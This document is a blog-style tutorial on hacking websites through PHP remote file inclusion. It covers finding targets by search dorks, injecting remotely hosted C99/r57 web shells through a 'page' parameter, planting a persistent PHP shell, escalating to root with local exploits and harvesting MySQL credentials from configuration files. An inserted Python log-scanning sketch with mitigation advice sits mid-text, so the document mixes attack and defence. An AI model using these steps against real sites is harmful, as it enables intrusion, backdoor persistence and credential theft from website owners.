HOW TO HACK Websites Using Remote File Inclusion

8:40 AM
Steps To Hack Websites Using Remote File Inclusion 
Step 1. Finding the Vulnerable Websites
First of all, we have to find a website that loads its pages using the PHP include() function and is vulnerable to RFI (Remote File Inclusion). The best technique is to find such websites using Google dorks. Google dorks are simply search queries that are used to pick out specific kinds of search results.
Step 2. Checking Whether the Website Is Vulnerable

To check whether the website is vulnerable to a remote file inclusion attack, we would try to include a website link instead of the PageName, as shown below.
http://target-site.com/index.php?page=http://google.com
Now if the Google home page opens, then it is confirmed that the website is vulnerable to a Remote File Inclusion attack and we will continue our attack. If the Google home page doesn't open, we will try another website.

Step 3. Remote Inclusion of Shells (Most Important Step)

Now we know that the website is hackable, so we will include the shells into the website. There are a number of shells available online, but my favorites are C99 and r57 because of their extended functionality and features.
There is no need to download these shells onto your system or PC; we can directly use the online resources for that, but if you wish you can download them from their respective websites. I will not provide these here because it's unethical, but Google it and you can find them easily.

To find a shell, the hacker would search Google for:
inurl:c99.txt
This will display many websites with the shell already up and ready to be included.
Note: you must include a ? after the URL of the shell so that if anything comes after c99.txt, it will be passed to the shell and not cause any problems.
For future analysis, you can download these shells from here:
http://www.localroot.net/
The new URL with the shell included would look like: 
http://target-site.com/index.php?page=http://site.com/c99.txt? 
Note: the ( ? ) is a must at the end of the URL.
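Seen from the server side, the requests in Steps 2 and 3 are easy to spot in an access log: a query parameter whose value is itself a remote URL. The following detection sketch is an added example, not part of the original post; the log lines, hosts and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# A parameter value that is itself an absolute remote URL.
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample input (documentation IPs, example hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:08:40:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Oct/2023:08:41:12 +0000] "GET /index.php?page=http://google.com HTTP/1.1" 200 14000',
    '203.0.113.9 - - [10/Oct/2023:08:42:30 +0000] "GET /index.php?page=http://site.example/c99.txt? HTTP/1.1" 200 30211',
    '203.0.113.9 - - [10/Oct/2023:08:43:02 +0000] "GET /index.php?page=http%3A%2F%2Fsite.example%2Fc99.txt%3F HTTP/1.1" 200 30211',
]

def find_rfi_attempts(log_lines):
    """Return (line_no, param, value, trailing_q) for every query parameter
    whose decoded value starts with a remote URL scheme."""
    findings = []
    for line_no, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parsable request line
        # Everything after the first '?' is the query string.
        _, _, query = match.group("target").partition("?")
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = unquote(value)  # second pass catches double encoding
            if REMOTE_URL_RE.match(value):
                # A trailing '?' is the marker described in the note above.
                findings.append((line_no, name, value, value.endswith("?")))
    return findings

if __name__ == "__main__":
    for line_no, name, value, trailing_q in find_rfi_attempts(SAMPLE_LOG):
        flag = " (trailing '?')" if trailing_q else ""
        print(f"line {line_no}: {name}={value}{flag}")
```

Parameters that legitimately carry URLs (redirect targets, for example) will also match, so triage hits by whether the parameter reaches include(). On the PHP side, allow_url_include should be Off and page names should be mapped through a fixed allowlist.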
Step 4. If the Attack Is Successful

If we succeed in getting the server to parse the shell, then we will see a screen similar to the following:
The shell will display information about the remote server and list all the files and directories on it. From here we would find a directory that has read and write privileges and upload the shell, but this time as a .php file, so that in case the vulnerability is fixed, the hacker will still be able to access it later on.

Last Step: Find Root Privileges on the Server (Getting Access)

Next, we would find a way to gain root privileges on the system. We can do this by uploading and running local exploits against the server. You can find a list of such exploits on milw0rm. We could also search the victim server for configuration files. These files most of the time contain usernames and passwords for the MySQL databases and such.

That's the whole way to hack websites using the remote file inclusion method. I hope you all have liked it. And I am sure you all have a lot of questions regarding this, so don't hesitate to ask in the form of comments. I will try to clear all your queries.
Enjoy, and do not forget to comment.
